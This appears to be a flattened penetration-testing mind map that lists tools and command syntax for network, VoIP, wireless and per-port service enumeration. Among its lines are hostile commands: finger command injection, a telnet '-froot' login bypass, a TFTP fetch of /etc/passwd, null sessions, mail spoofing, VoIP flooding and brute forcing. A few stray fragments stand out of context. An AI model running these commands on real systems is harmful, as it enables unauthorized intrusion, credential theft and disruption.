1. Back end files
1.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf
2. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS Fingerprinting Remote applications being served. OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS's respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent. Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.
2.1. Default Port Lists
2.1.1. Windows
2.1.2. *nix
2.2. Enumeration tools and techniques - The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific
2.2.1. General Enumeration Tools
2.2.1.1. nmap
2.2.1.1.1. nmap -n -A -PN -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml
2.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results
2.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results
2.2.1.1.4. nmap -A -sS -PN -n --script:all ip_address --reason
2.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list
2.2.1.2. netcat
2.2.1.2.1. nc -v -n IP_Address port
2.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number
2.2.1.3. amap
2.2.1.3.1. amap -bqv 192.168.1.1 80
2.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]
2.2.1.4. xprobe2
2.2.1.4.1. xprobe2 192.168.1.1
2.2.1.5. sinfp
2.2.1.5.1. ./sinfp.pl -i -p
2.2.1.6. nbtscan
2.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)
2.2.1.7. hping
2.2.1.7.1. hping ip_address
2.2.1.8. scanrand
2.2.1.8.1. scanrand ip_address:all
2.2.1.9. unicornscan
2.2.1.9.1. unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E
2.2.1.10. netenum
2.2.1.10.1. netenum network/netmask timeout
2.2.1.11. fping
2.2.1.11.1. fping -a -d hostname/ (Network/Subnet_Mask)
2.2.2. Firewall Specific Tools
2.2.2.1. firewalk
2.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]
2.2.2.2. ftester
2.2.2.2.1. host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log
2.2.3. Default Passwords (Examine list)
2.2.3.1. Passwords A
2.2.3.2. Passwords B
2.2.3.3. Passwords C
2.2.3.4. Passwords D
2.2.3.5. Passwords E
2.2.3.6. Passwords F
2.2.3.7. Passwords G
2.2.3.8. Passwords H
2.2.3.9. Passwords I
2.2.3.10. Passwords J
2.2.3.11. Passwords K
2.2.3.12. Passwords L
2.2.3.13. Passwords M
2.2.3.14. Passwords N
2.2.3.15. Passwords O
2.2.3.16. Passwords P
2.2.3.17. Passwords R
2.2.3.18. Passwords S
2.2.3.19. Passwords T
2.2.3.20. Passwords U
2.2.3.21. Passwords V
2.2.3.22. Passwords W
2.2.3.23. Passwords X
2.2.3.24. Passwords Y
2.2.3.25. Passwords Z
2.2.3.26. Passwords (Numeric)
2.3. Active Hosts
2.3.1. Open TCP Ports
2.3.2. Closed TCP Ports
2.3.3. Open UDP Ports
2.3.4. Closed UDP Ports
2.3.5. Service Probing
2.3.5.1. SMTP Mail Bouncing
2.3.5.2. Banner Grabbing
2.3.5.2.1. Other
2.3.5.2.2. HTTP
2.3.5.2.3. HTTPS
2.3.5.2.4. SMTP
2.3.5.2.5. POP3
2.3.5.2.6. FTP
2.3.6. ICMP Responses
2.3.6.1. Type 3 (Port Unreachable)
2.3.6.2. Type 8 (Echo Request)
2.3.6.3. Type 13 (Timestamp Request)
2.3.6.4. Type 15 (Information Request)
2.3.6.5. Type 17 (Subnet Address Mask Request)
2.3.6.6. Responses from broadcast address
2.3.7. Source Port Scans
2.3.7.1. TCP/UDP 53 (DNS)
2.3.7.2. TCP 20 (FTP Data)
2.3.7.3. TCP 80 (HTTP)
2.3.7.4. TCP/UDP 88 (Kerberos)
2.3.8. Firewall Assessment
2.3.8.1. Firewalk
2.3.8.2. TCP/UDP/ICMP responses
2.3.9. OS Fingerprint
3. InitialProgram=c:\windows\system32\cmd.exe
4. Nabil contributed the AS/400 section.
5. VoIP Security
5.1. Sniffing Tools
5.1.1. AuthTool
5.1.2. Cain & Abel
5.1.3. Etherpeek
5.1.4. NetDude
5.1.5. Oreka
5.1.6. PSIPDump
5.1.7. SIPomatic
5.1.8. SIPv6 Analyzer
5.1.9. UCSniff
5.1.10. VoiPong
5.1.11. VOMIT
5.1.12. Wireshark
5.1.13. WIST - Web Interface for SIP Trace
5.2. Scanning and Enumeration Tools
5.2.1. enumIAX
5.2.2. fping
5.2.3. IAX Enumerator
5.2.4. iWar
5.2.5. Nessus
5.2.6. Nmap
5.2.7. SIP Forum Test Framework (SFTF)
5.2.8. SIPcrack
5.2.9. sipflanker
5.2.9.1. python sipflanker.py 192.168.1-254
5.2.10. SIP-Scan
5.2.11. SIP.Tastic
5.2.12. SIPVicious
5.2.13. SiVuS
5.2.14. SMAP
5.2.14.1. smap IP_Address/Subnet_Mask
5.2.14.2. smap -o IP_Address/Subnet_Mask
5.2.14.3. smap -l IP_Address
5.2.15. snmpwalk
5.2.16. VLANping
5.2.17. VoIPAudit
5.2.18. VoIP GHDB Entries
5.2.19. VoIP Voicemail Database
5.3. Packet Creation and Flooding Tools
5.3.1. H.323 Injection Files
5.3.2. H225regreject
5.3.3. IAXHangup
5.3.4. IAXAuthJack
5.3.5. IAX.Brute
5.3.6. IAXFlooder
5.3.6.1. ./iaxflood sourcename destinationname numpackets
5.3.7. INVITE Flooder
5.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets
5.3.8. kphone-ddos
5.3.9. RTP Flooder
5.3.10. rtpbreak
5.3.11. Scapy
5.3.12. Seagull
5.3.13. SIPBomber
5.3.14. SIPNess
5.3.15. SIPp
5.3.16. SIPsak
5.3.16.1. Tracing paths: - sipsak -T -s sip:usernaem@domain
5.3.16.2. Options request:- sipsak -vv -s sip:username@domain
5.3.16.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
5.3.17. SIP-Send-Fun
5.3.18. SIPVicious
5.3.19. Spitter
5.3.20. TFTP Brute Force
5.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>
5.3.21. UDP Flooder
5.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets
5.3.22. UDP Flooder (with VLAN Support)
5.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets
5.3.23. Voiphopper
5.4. Fuzzing Tools
5.4.1. Asteroid
5.4.2. Codenomicon VoIP Fuzzers
5.4.3. Fuzzy Packet
5.4.4. Mu Security VoIP Fuzzing Platform
5.4.5. ohrwurm RTP Fuzzer
5.4.6. PROTOS H.323 Fuzzer
5.4.7. PROTOS SIP Fuzzer
5.4.8. SIP Forum Test Framework (SFTF)
5.4.9. Sip-Proxy
5.4.10. Spirent ThreatEx
5.5. Signaling Manipulation Tools
5.5.1. AuthTool
5.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v
5.5.2. BYE Teardown
5.5.3. Check Sync Phone Rebooter
5.5.4. RedirectPoison
5.5.4.1. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"
5.5.5. Registration Adder
5.5.6. Registration Eraser
5.5.7. Registration Hijacker
5.5.8. SIP-Kill
5.5.9. SIP-Proxy-Kill
5.5.10. SIP-RedirectRTP
5.5.11. SipRogue
5.5.12. vnak
5.6. Media Manipulation Tools
5.6.1. RTP InsertSound
5.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
5.6.2. RTP MixSound
5.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
5.6.3. RTPProxy
5.6.4. RTPInject
5.7. Generic Software Suites
5.7.1. OAT Office Communication Server Tool Assessment
5.7.2. EnableSecurity VOIPPACK
5.7.2.1. Note: - Add-on for Immunity Canvas
5.8. References
5.8.1. URL's
5.8.1.1. Common Vulnerabilities and Exploits (CVE)
5.8.1.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip
5.8.1.2. Default Passwords
5.8.1.3. Hacking Exposed VoIP
5.8.1.3.1. Tool Pre-requisites
5.8.1.4. VoIPsa
5.8.2. White Papers
5.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems
5.8.2.2. An Analysis of VoIP Security Threats and Tools
5.8.2.3. Hacking VoIP Exposed
5.8.2.4. Security testing of SIP implementations
5.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks
5.8.2.6. Two attacks against VoIP
5.8.2.7. VoIP Attacks!
5.8.2.8. VoIP Security Audit Program (VSAP)
6. Wireless Penetration
6.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester, (and hence, the customer), a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting weith the customer should allow you to estimate the timescales required to carry the assessment out.
6.1.1. Site Map
6.1.1.1. RF Map
6.1.1.1.1. Lines of Sight
6.1.1.1.2. Signal Coverage
6.1.1.2. Physical Map
6.1.1.2.1. Triangulate APs
6.1.1.2.2. Satellite Imagery
6.1.2. Network Map
6.1.2.1. MAC Filter
6.1.2.1.1. Authorised MAC Addresses
6.1.2.1.2. Reaction to Spoofed MAC Addresses
6.1.2.2. Encryption Keys utilised
6.1.2.2.1. WEP
6.1.2.2.2. WPA/PSK
6.1.2.2.3. 802.1x
6.1.2.3. Access Points
6.1.2.3.1. ESSID
6.1.2.3.2. BSSIDs
6.1.2.4. Wireless Clients
6.1.2.4.1. MAC Addresses
6.1.2.4.2. Intercepted Traffic
6.2. Wireless Toolkit
6.2.1. Wireless Discovery
6.2.1.1. Aerosol
6.2.1.2. Airfart
6.2.1.3. Aphopper
6.2.1.4. Apradar
6.2.1.5. BAFFLE
6.2.1.6. inSSIDer
6.2.1.7. iWEPPro
6.2.1.8. karma
6.2.1.9. KisMAC-ng
6.2.1.10. Kismet
6.2.1.11. MiniStumbler
6.2.1.12. Netstumbler
6.2.1.13. Vistumbler
6.2.1.14. Wellenreiter
6.2.1.15. Wifi Hopper
6.2.1.16. WirelessMon
6.2.1.17. WiFiFoFum
6.2.2. Packet Capture
6.2.2.1. Airopeek
6.2.2.2. Airpcap
6.2.2.3. Airtraf
6.2.2.4. Apsniff
6.2.2.5. Cain
6.2.2.6. Commview
6.2.2.7. Ettercap
6.2.2.8. Netmon
6.2.2.8.1. nmwifi
6.2.2.9. Wireshark
6.2.3. EAP Attack tools
6.2.3.1. eapmd5pass
6.2.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump
6.2.3.1.2. Untitled
6.2.4. Leap Attack Tools
6.2.4.1. asleap
6.2.4.2. thc leap cracker
6.2.4.3. anwrap
6.2.5. WEP/ WPA Password Attack Tools
6.2.5.1. Airbase
6.2.5.2. Aircrack-ptw
6.2.5.3. Aircrack-ng
6.2.5.4. Airsnort
6.2.5.5. cowpatty
6.2.5.6. FiOS Wireless Key Calculator
6.2.5.7. iWifiHack
6.2.5.8. KisMAC-ng
6.2.5.9. Rainbow Tables
6.2.5.10. wep attack
6.2.5.11. wep crack
6.2.5.12. wzcook
6.2.6. Frame Generation Software
6.2.6.1. Airgobbler
6.2.6.2. airpwn
6.2.6.3. Airsnarf
6.2.6.4. Commview
6.2.6.5. fake ap
6.2.6.6. void 11
6.2.6.7. wifi tap
6.2.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]
6.2.6.8. FreeRADIUS - Wireless Pwnage Edition
6.2.7. Mapping Software
6.2.7.1. Online Mapping
6.2.7.1.1. WIGLE
6.2.7.1.2. Skyhook
6.2.7.2. Tools
6.2.7.2.1. Knsgem
6.2.8. File Format Conversion Tools
6.2.8.1. ns1 recovery and conversion tool
6.2.8.2. warbable
6.2.8.3. warkizniz
6.2.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]
6.2.8.4. ivstools
6.2.9. IDS Tools
6.2.9.1. WIDZ
6.2.9.2. War Scanner
6.2.9.3. Snort-Wireless
6.2.9.4. AirDefense
6.2.9.5. AirMagnet
6.3. WLAN discovery
6.3.1. Unencrypted WLAN
6.3.1.1. Visible SSID
6.3.1.1.1. Sniff for IP range
6.3.1.2. Hidden SSID
6.3.1.2.1. Deauth client
6.3.2. WEP encrypted WLAN
6.3.2.1. Visible SSID
6.3.2.1.1. WEPattack
6.3.2.2. Hidden SSID
6.3.2.2.1. Deauth client
6.3.3. WPA / WPA2 encrypted WLAN
6.3.3.1. Deauth client
6.3.3.1.1. Capture EAPOL handshake
6.3.4. LEAP encrypted WLAN
6.3.4.1. Deauth client
6.3.4.1.1. Break LEAP
6.3.5. 802.1x WLAN
6.3.5.1. Create Rogue Access Point
6.3.5.1.1. Airsnarf
6.3.5.1.2. fake ap
6.3.5.1.3. Hotspotter
6.3.5.1.4. Karma
6.3.5.1.5. Linux rogue AP
6.3.6. Resources
6.3.6.1. URL's
6.3.6.1.1. Wirelessdefence.org
6.3.6.1.2. Russix
6.3.6.1.3. Wardrive.net
6.3.6.1.4. Wireless Vulnerabilities and Exploits (WVE)
6.3.6.2. White Papers
6.3.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4
6.3.6.2.2. 802.11b Firmware-Level Attacks
6.3.6.2.3. Wireless Attacks from an Intrusion Detection Perspective
6.3.6.2.4. Implementing a Secure Wireless Network for a Windows Environment
6.3.6.2.5. Breaking 104 bit WEP in less than 60 seconds
6.3.6.2.6. PEAP Shmoocon2008 Wright & Antoniewicz
6.3.6.2.7. Active behavioral fingerprinting of wireless devices
6.3.6.3. Common Vulnerabilities and Exploits (CVE)
6.3.6.3.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless
7. Pre-Inspection Visit - template
8. pwdump [-h][-o][-u][-p] machineName
9. Client Side Security
10. Set objShell = CreateObject("WScript.Shell")
11. Check visible areas for sensitive information.
12. Enumeration
12.1. Daytime port 13 open
12.1.1. nmap nse script
12.1.1.1. daytime
12.2. FTP port 21 open
12.2.1. Fingerprint server
12.2.1.1. telnet ip_address 21 (Banner grab)
12.2.1.2. Run command ftp ip_address
12.2.1.3. ftp@example.com
12.2.1.4. Check for anonymous access
12.2.1.4.1. ftp ip_addressUsername: anonymous OR anonPassword: any@email.com
12.2.2. Password guessing
12.2.2.1. Hydra brute force
12.2.2.2. medusa
12.2.2.3. Brutus
12.2.3. Examine configuration files
12.2.3.1. ftpusers
12.2.3.2. ftp.conf
12.2.3.3. proftpd.conf
12.2.4. MiTM
12.2.4.1. pasvagg.pl
12.3. SSH port 22 open
12.3.1. Fingerprint server
12.3.1.1. telnet ip_address 22 (banner grab)
12.3.1.2. scanssh
12.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
12.3.2. Password guessing
12.3.2.1. ssh root@ip_address
12.3.2.2. guess-who
12.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location
12.3.2.3. Hydra brute force
12.3.2.4. brutessh
12.3.2.5. Ruby SSH Bruteforcer
12.3.3. Examine configuration files
12.3.3.1. ssh_config
12.3.3.2. sshd_config
12.3.3.3. authorized_keys
12.3.3.4. ssh_known_hosts
12.3.3.5. .shosts
12.3.4. SSH Client programs
12.3.4.1. tunnelier
12.3.4.2. winsshd
12.3.4.3. putty
12.3.4.4. winscp
12.4. Telnet port 23 open
12.4.1. Fingerprint server
12.4.1.1. telnet ip_address
12.4.1.1.1. Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster
12.4.1.2. telnetfp
12.4.2. Password Attack
12.4.2.1. Untitled
12.4.2.2. Hydra brute force
12.4.2.3. Brutus
12.4.2.4. telnet -l "-froot" hostname (Solaris 10+)
12.4.3. Examine configuration files
12.4.3.1. /etc/inetd.conf
12.4.3.2. /etc/xinetd.d/telnet
12.4.3.3. /etc/xinetd.d/stelnet
12.5. Sendmail Port 25 open
12.5.1. Fingerprint server
12.5.1.1. telnet ip_address 25 (banner grab)
12.5.2. Mail Server Testing
12.5.2.1. Enumerate users
12.5.2.1.1. VRFY username (verifies if username exists - enumeration of accounts)
12.5.2.1.2. EXPN username (verifies if username is valid - enumeration of accounts)
12.5.2.2. Mail Spoof Test
12.5.2.2.1. HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT
12.5.2.3. Mail Relay Test
12.5.2.3.1. Untitled
12.5.3. Examine Configuration Files
12.5.3.1. sendmail.cf
12.5.3.2. submit.cf
12.6. DNS port 53 open
12.6.1. Fingerprint server/ service
12.6.1.1. host
12.6.1.1.1. host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.
12.6.1.2. nslookup
12.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]
12.6.1.3. dig
12.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
12.6.1.4. whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup
12.6.2. DNS Enumeration
12.6.2.1. Bile Suite
12.6.2.1.1. perl BiLE.pl [website] [project_name]
12.6.2.1.2. perl BiLE-weigh.pl [website] [input file]
12.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
12.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]
12.6.2.1.5. perl exp-tld.pl [input file] [output file]
12.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
12.6.2.1.7. perl qtrace.pl [ip_address_file] [output_file]
12.6.2.1.8. perl jarf-rev [subnetblock] [nameserver]
12.6.2.2. txdns
12.6.2.2.1. txdns -rt -t domain_name
12.6.2.2.2. txdns -x 50 -bb domain_name
12.6.2.3. nmap nse scripts
12.6.2.3.1. dns-random-srcport
12.6.2.3.2. dns-random-txid
12.6.2.3.3. dns-recursion
12.6.2.3.4. dns-zone-transfer
12.6.3. Examine Configuration Files
12.6.3.1. host.conf
12.6.3.2. resolv.conf
12.6.3.3. named.conf
12.7. TFTP port 69 open
12.7.1. TFTP Enumeration
12.7.1.1. tftp ip_address PUT local_file
12.7.1.2. tftp ip_address GET conf.txt (or other files)
12.7.1.3. Solarwinds TFTP server
12.7.1.4. tftp – i <IP> GET /etc/passwd (old Solaris)
12.7.2. TFTP Bruteforcing
12.7.2.1. TFTP bruteforcer
12.7.2.2. Cisco-Torch
12.8. Finger Port 79 open
12.8.1. User enumeration
12.8.1.1. finger 'a b c d e f g h' @example.com
12.8.1.2. finger admin@example.com
12.8.1.3. finger user@example.com
12.8.1.4. finger 0@example.com
12.8.1.5. finger .@example.com
12.8.1.6. finger **@example.com
12.8.1.7. finger test@example.com
12.8.1.8. finger @example.com
12.8.1.9. nmap nse script
12.8.1.9.1. finger
12.8.2. Command execution
12.8.2.1. finger "|/bin/id@example.com"
12.8.2.2. finger "|/bin/ls -a /@example.com"
12.8.3. Finger Bounce
12.8.3.1. finger user@host@victim
12.8.3.2. finger @internal@external
12.9. Web Ports 80,8080 etc. open
12.9.1. Fingerprint server
12.9.1.1. Telnet ip_address port
12.9.1.2. Firefox plugins
12.9.1.2.1. All
12.9.1.2.2. Specific
12.9.2. Crawl website
12.9.2.1. lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source
12.9.2.2. httprint
12.9.2.3. Metagoofil
12.9.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
12.9.3. Web Directory enumeration
12.9.3.1. Nikto
12.9.3.1.1. nikto [-h target] [options]
12.9.3.2. DirBuster
12.9.3.3. Wikto
12.9.3.4. Goolag Scanner
12.9.4. Vulnerability Assessment
12.9.4.1. Manual Tests
12.9.4.1.1. Default Passwords
12.9.4.1.2. Install Backdoors
12.9.4.1.3. Method Testing
12.9.4.1.4. Upload Files
12.9.4.1.5. View Page Source
12.9.4.1.6. Input Validation Checks
12.9.4.1.7. Automated table and column iteration
12.9.4.2. Vulnerability Scanners
12.9.4.2.1. Acunetix
12.9.4.2.2. Grendelscan
12.9.4.2.3. NStealth
12.9.4.2.4. Obiwan III
12.9.4.2.5. w3af
12.9.4.3. Specific Applications/ Server Tools
12.9.4.3.1. Domino
12.9.4.3.2. Joomla
12.9.4.3.3. aspaudit.pl
12.9.4.3.4. Vbulletin
12.9.4.3.5. ZyXel
12.9.5. Proxy Testing
12.9.5.1. Burpsuite
12.9.5.2. Crowbar
12.9.5.3. Interceptor
12.9.5.4. Paros
12.9.5.5. Requester Raw
12.9.5.6. Suru
12.9.5.7. WebScarab
12.9.6. Examine configuration files
12.9.6.1. Generic
12.9.6.1.1. Examine httpd.conf/ windows config files
12.9.6.2. JBoss
12.9.6.2.1. JMX Console http://<IP>:8080/jmxconcole/
12.9.6.3. Joomla
12.9.6.3.1. configuration.php
12.9.6.3.2. diagnostics.php
12.9.6.3.3. joomla.inc.php
12.9.6.3.4. config.inc.php
12.9.6.4. Mambo
12.9.6.4.1. configuration.php
12.9.6.4.2. config.inc.php
12.9.6.5. Wordpress
12.9.6.5.1. setup-config.php
12.9.6.5.2. wp-config.php
12.9.6.6. ZyXel
12.9.6.6.1. /WAN.html (contains PPPoE ISP password)
12.9.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)
12.9.6.6.3. /rpDyDNS.html (contains DDNS credentials)
12.9.6.6.4. /Firewall_DefPolicy.html (Firewall)
12.9.6.6.5. /CF_Keyword.html (Content Filter)
12.9.6.6.6. /RemMagWWW.html (Remote MGMT)
12.9.6.6.7. /rpSysAdmin.html (System)
12.9.6.6.8. /LAN_IP.html (LAN)
12.9.6.6.9. /NAT_General.html (NAT)
12.9.6.6.10. /ViewLog.html (Logs)
12.9.6.6.11. /rpFWUpload.html (Tools)
12.9.6.6.12. /DiagGeneral.html (Diagnostic)
12.9.6.6.13. /RemMagSNMP.html (SNMP Passwords)
12.9.6.6.14. /LAN_ClientList.html (Current DHCP Leases)
12.9.6.6.15. Config Backups
12.9.7. Examine web server logs
12.9.7.1. c:\winnt\system32\Logfiles\W3SVC1
12.9.7.1.1. awk -F " " '{print $3,$11} filename | sort | uniq
12.9.8. References
12.9.8.1. White Papers
12.9.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
12.9.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
12.9.8.1.3. Blind Security Testing - An Evolutionary Approach
12.9.8.1.4. Command Injection in XML Signatures and Encryption
12.9.8.1.5. Input Validation Cheat Sheet
12.9.8.1.6. SQL Injection Cheat Sheet
12.9.8.2. Books
12.9.8.2.1. Hacking Exposed Web 2.0
12.9.8.2.2. Hacking Exposed Web Applications
12.9.8.2.3. The Web Application Hacker's Handbook
12.9.9. Exploit Frameworks
12.9.9.1. Brute-force Tools
12.9.9.1.1. Acunetix
12.9.9.2. Metasploit
12.9.9.3. w3af
12.10. Portmapper port 111 open
12.10.1. rpcdump.py
12.10.1.1. rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
12.10.2. rpcinfo
12.10.2.1. rpcinfo [options] IP_Address
12.11. NTP Port 123 open
12.11.1. NTP Enumeration
12.11.1.1. ntpdc -c monlist IP_ADDRESS
12.11.1.2. ntpdc -c sysinfo IP_ADDRESS
12.11.1.3. ntpq
12.11.1.3.1. host
12.11.1.3.2. hostname
12.11.1.3.3. ntpversion
12.11.1.3.4. readlist
12.11.1.3.5. version
12.11.2. Examine configuration files
12.11.2.1. ntp.conf
12.11.3. nmap nse script
12.11.3.1. ntp-info
12.12. NetBIOS Ports 135-139,445 open
12.12.1. NetBIOS enumeration
12.12.1.1. Enum
12.12.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
12.12.1.2. Null Session
12.12.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""
12.12.1.3. Smbclient
12.12.1.3.1. smbclient -L //server/share password options
12.12.1.4. Superscan
12.12.1.4.1. Enumeration tab.
12.12.1.5. user2sid/sid2user
12.12.1.6. Winfo
12.12.2. NetBIOS brute force
12.12.2.1. Hydra
12.12.2.2. Brutus
12.12.2.3. Cain & Abel
12.12.2.4. getacct
12.12.2.5. NAT (NetBIOS Auditing Tool)
12.12.3. Examine Configuration Files
12.12.3.1. Smb.conf
12.12.3.2. lmhosts
12.13. SNMP port 161 open
12.13.1. Default Community Strings
12.13.1.1. public
12.13.1.2. private
12.13.1.3. cisco
12.13.1.3.1. cable-docsis
12.13.1.3.2. ILMI
12.13.2. MIB enumeration
12.13.2.1. Windows NT
12.13.2.1.1. .1.3.6.1.2.1.1.5 Hostnames
12.13.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name
12.13.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames
12.13.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
12.13.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information
12.13.2.2. Solarwinds MIB walk
12.13.2.3. Getif
12.13.2.4. snmpwalk
12.13.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>
12.13.2.5. Snscan
12.13.2.6. Applications
12.13.2.6.1. ZyXel
12.13.2.7. nmap nse script
12.13.2.7.1. snmp-sysdescr
12.13.3. SNMP Bruteforce
12.13.3.1. onesixtyone
12.13.3.1.1. onesixytone -c SNMP.wordlist <IP>
12.13.3.2. cat
12.13.3.2.1. ./cat -h <IP> -w SNMP.wordlist
12.13.3.3. Solarwinds SNMP Brute Force
12.13.3.4. ADMsnmp
12.13.3.5. nmap nse script
12.13.3.5.1. snmp-brute
12.13.4. Examine SNMP Configuration files
12.13.4.1. snmp.conf
12.13.4.2. snmpd.conf
12.13.4.3. snmp-config.xml
12.14. LDAP Port 389 Open
12.14.1. ldap enumeration
12.14.1.1. ldapminer
12.14.1.1.1. ldapminer -h ip_address -p port (not required if default) -d
12.14.1.2. luma
12.14.1.2.1. Gui based tool
12.14.1.3. ldp
12.14.1.3.1. Gui based tool
12.14.1.4. openldap
12.14.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
12.14.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
12.14.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
12.14.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
